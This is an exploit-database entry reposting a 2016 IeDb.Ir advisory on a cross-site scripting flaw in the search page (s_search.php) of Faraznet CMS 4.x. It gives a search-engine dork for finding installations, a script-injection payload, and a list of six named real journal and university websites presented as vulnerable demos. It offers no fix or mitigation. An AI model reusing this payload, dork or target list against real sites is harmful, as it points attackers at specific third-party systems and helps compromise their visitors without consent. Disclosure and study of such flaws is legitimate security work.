Faraznet CMS 4.x Cross Site Scripting

2016.11.08
Credit: IeDb.Ir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: "Designed By Faraznet"

Cross-Site Scripting in Faraznet Cms Version 4.x ########################### # Faraznet Cms Cross-Site Scripting Vulnerability ########################### ##################################### # Iranian Exploit DataBase And Security Team - iedb.ir # Title : Faraznet Cms Cross-Site Scripting Vulnerability # Vulnerability : Cross-Site Scripting (xss) # Vulnerability on : s_search.php # Version : 4.x # Dork : "Designed By Faraznet" # Vendor site : http://www.faraznet.net # Author : IeDb.Ir # Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir # Vulnerability attack information site : http://xssed.Ir Telegram : https://telegram.me/joinchat/BdNXvD3FrFLG8tVtIfTjaQ Email : iedb.team@gmail.com # Archive Exploit : http://iedb.ir/exploits-6119.html ##################################### # Bug : http://www.site.com/en/s_search.php Post Script : '"<script>alert(/Iedb.Ir/)</script> # Dem0 [ Xss ] http://ijssh.com/en/s_search.php http://www.intjournalssm.com/en/s_search.php http://www.sjsmjournal.com/en/s_search.php http://www.irjabs.com/en/s_search.php http://geo-tech.iauzah.ac.ir/en/s_search.php http://www.nafasjournal.ir/en/s_search.php ##################################### Tnks To : All Member In Iedb.ir And Iedb.ir/acc And Xssed.ir ##################################### # Archive Exploit = http://iedb.ir/exploits-6119.html ##################################### ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-11-07] ###########################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top